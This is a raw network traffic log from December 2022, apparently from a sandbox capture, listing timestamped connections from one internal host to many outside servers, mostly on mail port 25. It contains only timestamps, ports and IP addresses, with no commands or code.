                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.376528978 CET2549939124.47.150.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.391565084 CET254994967.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.391608953 CET2549939124.47.150.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.391630888 CET254994967.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.391761065 CET4994925192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.391819954 CET4994925192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.391998053 CET4993925192.168.2.3124.47.150.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.411356926 CET254995098.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.411592007 CET4995025192.168.2.398.136.96.91
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.413408041 CET2549943104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.413515091 CET4994325192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.421533108 CET2549873211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.421633959 CET4987325192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.465584040 CET2549951165.12.244.5192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.465692997 CET4995125192.168.2.3165.12.244.5
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.467339993 CET254995467.195.228.109192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.467555046 CET4995425192.168.2.367.195.228.109
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.482980967 CET2549947203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.483047962 CET2549947203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.483119965 CET4994725192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.483205080 CET4994725192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.484586954 CET2549952104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.484714985 CET4995225192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.505805969 CET254994967.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.507803917 CET4995625192.168.2.3139.138.31.123
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.541623116 CET254995349.0.10.212192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.541776896 CET4995325192.168.2.349.0.10.212
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.554775000 CET254995098.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.554812908 CET254995098.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.554976940 CET4995025192.168.2.398.136.96.91
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.595392942 CET2549942203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.632131100 CET2549944103.13.69.122192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.632265091 CET4994425192.168.2.3103.13.69.122
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.639995098 CET254995467.195.228.109192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.640836954 CET4995425192.168.2.367.195.228.109
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.659013987 CET2549939124.47.150.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.659101963 CET4993925192.168.2.3124.47.150.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.691112041 CET4995725192.168.2.3103.13.69.122
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.697654009 CET2549943104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.697757959 CET4994325192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.698421001 CET254995098.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.698468924 CET254995098.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.698529005 CET4995025192.168.2.398.136.96.91
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.698754072 CET4995025192.168.2.398.136.96.91
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.724548101 CET2549955203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.724759102 CET4995525192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.730731964 CET2549951165.12.244.5192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.762762070 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.762892008 CET4995625192.168.2.3139.138.31.123
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.782625914 CET4995825192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.812813997 CET254995467.195.228.109192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.812849045 CET254995467.195.228.109192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.813007116 CET4995425192.168.2.367.195.228.109
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.839931965 CET2549948203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.839966059 CET2549948203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.840054035 CET4994825192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.840091944 CET4994825192.168.2.3203.36.172.106
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.841486931 CET254995098.136.96.91192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.848275900 CET2549947203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.870682001 CET4995925192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.878345013 CET2549951165.12.244.5192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.878377914 CET2549951165.12.244.5192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.878422976 CET4995125192.168.2.3165.12.244.5
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.878458023 CET4995125192.168.2.3165.12.244.5
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.880717993 CET254995349.0.10.212192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.886795998 CET2549952104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.886955976 CET4995225192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.889420033 CET4996025192.168.2.3202.124.68.52
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.963936090 CET2549944103.13.69.122192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.968449116 CET2549957103.13.69.122192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.968554020 CET4995725192.168.2.3103.13.69.122
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.981997013 CET2549943104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.982207060 CET4994325192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.986960888 CET254995467.195.228.109192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.987000942 CET254995467.195.228.109192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.987108946 CET4995425192.168.2.367.195.228.109
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.987227917 CET4995425192.168.2.367.195.228.109
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.018039942 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.052189112 CET2549774182.160.153.182192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.052532911 CET4977425192.168.2.3182.160.153.182
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.095807076 CET2549958211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.096776009 CET4995825192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.116513968 CET4996125192.168.2.3142.251.8.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.143502951 CET2549951165.12.244.5192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.154922962 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.155062914 CET4995625192.168.2.3139.138.31.123
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.160517931 CET254995467.195.228.109192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.170312881 CET2549952104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.170553923 CET4995225192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.172216892 CET2549948203.36.172.106192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.233553886 CET4996225192.168.2.3209.222.82.255
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.235658884 CET2549959203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.235769987 CET4995925192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.246175051 CET2549957103.13.69.122192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.246284008 CET4995725192.168.2.3103.13.69.122
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.249388933 CET4996325192.168.2.3112.140.176.121
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.265053988 CET2549943104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.265914917 CET2549943104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.265997887 CET4994325192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.296020985 CET4996425192.168.2.398.136.96.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.302970886 CET2549774182.160.153.182192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.303288937 CET4977425192.168.2.3182.160.153.182
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.347740889 CET4996525192.168.2.3203.134.22.24
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.352721930 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.352771044 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.352771044 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.352771044 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.352797985 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.352930069 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.352957010 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.352966070 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.352974892 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.352997065 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.357717037 CET4991980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.387904882 CET2549962209.222.82.255192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.389583111 CET4996225192.168.2.3209.222.82.255
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.410126925 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.410172939 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.410295963 CET4995625192.168.2.3139.138.31.123
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.421878099 CET8049919185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.422041893 CET8049919185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.422122002 CET4991980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.432457924 CET2549961142.251.8.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.432527065 CET254996498.136.96.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.432630062 CET4996125192.168.2.3142.251.8.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.432666063 CET4996425192.168.2.398.136.96.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.454240084 CET2549952104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.454463959 CET4995225192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.479429960 CET4996625192.168.2.3103.13.69.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.498353958 CET2549963112.140.176.121192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.498534918 CET4996325192.168.2.3112.140.176.121
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.523519039 CET2549957103.13.69.122192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.523561954 CET2549957103.13.69.122192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.523807049 CET4995725192.168.2.3103.13.69.122
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.553378105 CET2549774182.160.153.182192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.553787947 CET4977425192.168.2.3182.160.153.182
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.559983969 CET4996725192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.582962036 CET2549962209.222.82.255192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.583290100 CET4996225192.168.2.3209.222.82.255
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.597024918 CET254996498.136.96.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.597160101 CET4996425192.168.2.398.136.96.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.600260973 CET2549965203.134.22.24192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.600421906 CET4996525192.168.2.3203.134.22.24
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.602529049 CET4993525192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.633831978 CET4987125192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.656258106 CET254992520.92.134.58192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.656682968 CET4992525192.168.2.320.92.134.58
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.665430069 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.669115067 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.669154882 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.669173002 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.669189930 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.669204950 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.669220924 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.669235945 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.669251919 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.669265985 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.669281006 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.672741890 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.672914028 CET4995625192.168.2.3139.138.31.123
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.732611895 CET2549961142.251.8.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.732738018 CET4996125192.168.2.3142.251.8.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.733542919 CET254996498.136.96.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.733580112 CET254996498.136.96.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.733710051 CET4996425192.168.2.398.136.96.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.738606930 CET2549962209.222.82.255192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.738641977 CET2549962209.222.82.255192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.738656998 CET2549952104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.738765955 CET4996225192.168.2.3209.222.82.255
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.738779068 CET4995225192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.748718977 CET2549963112.140.176.121192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.748832941 CET4996325192.168.2.3112.140.176.121
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.757591963 CET2549966103.13.69.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.757730961 CET4996625192.168.2.3103.13.69.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.773951054 CET2549959203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.774101973 CET4995925192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.774250984 CET2549959203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.774343014 CET4995925192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.778539896 CET4996825192.168.2.3103.13.69.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.801238060 CET2549957103.13.69.122192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.801588058 CET4995725192.168.2.3103.13.69.122
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.843066931 CET2549774182.160.153.182192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.846416950 CET4996925192.168.2.3203.36.137.234
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.865700960 CET2549965203.134.22.24192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.865746021 CET2549965203.134.22.24192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.865827084 CET4996525192.168.2.3203.134.22.24
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.865864992 CET4996525192.168.2.3203.134.22.24
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.866738081 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.866858006 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.866929054 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.866995096 CET4991525192.168.2.3142.251.8.27
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.870280027 CET2549961142.251.8.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.870654106 CET254996498.136.96.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.870697021 CET4996125192.168.2.3142.251.8.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.870810032 CET4996425192.168.2.398.136.96.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.870862007 CET254996498.136.96.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.870991945 CET4996425192.168.2.398.136.96.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.888109922 CET254996727.32.32.10192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.888278008 CET4996725192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.893045902 CET2549962209.222.82.255192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.893227100 CET4996225192.168.2.3209.222.82.255
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.908799887 CET4997025192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.917156935 CET4997125192.168.2.3142.250.150.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.927966118 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.932732105 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.933007002 CET4995625192.168.2.3139.138.31.123
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.937170029 CET254992520.92.134.58192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.937335968 CET4992525192.168.2.320.92.134.58
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.971173048 CET2549971142.250.150.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.971286058 CET4997125192.168.2.3142.250.150.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.995781898 CET4997225192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.997492075 CET2549963112.140.176.121192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.997720957 CET2549963112.140.176.121192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.997838020 CET4996325192.168.2.3112.140.176.121
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.007332087 CET254996498.136.96.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.021471977 CET2549952104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.022253990 CET2549952104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.022336960 CET4995225192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.036228895 CET2549966103.13.69.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.036351919 CET4996625192.168.2.3103.13.69.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.049884081 CET254997098.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.052808046 CET2549962209.222.82.255192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.053018093 CET4997025192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.053179979 CET4996225192.168.2.3209.222.82.255
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.056736946 CET2549968103.13.69.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.056874990 CET4996825192.168.2.3103.13.69.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.098491907 CET4997325192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.102072954 CET2549971142.250.150.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.102184057 CET4997125192.168.2.3142.250.150.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.118287086 CET2549965203.134.22.24192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.118345022 CET2549957103.13.69.122192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.121843100 CET2549958211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.121937037 CET4995825192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.125118971 CET2549957103.13.69.122192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.125251055 CET4995725192.168.2.3103.13.69.122
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.139271975 CET2549959203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.151372910 CET2549944103.13.69.122192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.151509047 CET4994425192.168.2.3103.13.69.122
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.156132936 CET2549971142.250.150.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.158346891 CET2549971142.250.150.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.158534050 CET4997125192.168.2.3142.250.150.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.160809994 CET4997425192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.163922071 CET4997525192.168.2.367.195.204.79
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.177722931 CET2549969203.36.137.234192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.177839994 CET4996925192.168.2.3203.36.137.234
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.183232069 CET2549915142.251.8.27192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.186556101 CET2549961142.251.8.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.188119888 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.188213110 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.188337088 CET4995625192.168.2.3139.138.31.123
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.188559055 CET2549956139.138.31.123192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.188635111 CET4995625192.168.2.3139.138.31.123
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.194396019 CET254997098.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.194530964 CET4997025192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.212588072 CET254997367.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.212729931 CET4997325192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.213010073 CET2549971142.250.150.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.213145018 CET4997125192.168.2.3142.250.150.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.216346025 CET254996727.32.32.10192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.216487885 CET4996725192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.233566046 CET4997625192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.247018099 CET2549962209.222.82.255192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.266062975 CET2549962209.222.82.255192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.266371012 CET4996225192.168.2.3209.222.82.255
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.272670984 CET2549971142.250.150.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.286664963 CET2549963112.140.176.121192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.289549112 CET4997725192.168.2.3203.134.153.161
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.308129072 CET2549961142.251.8.26192.168.2.3
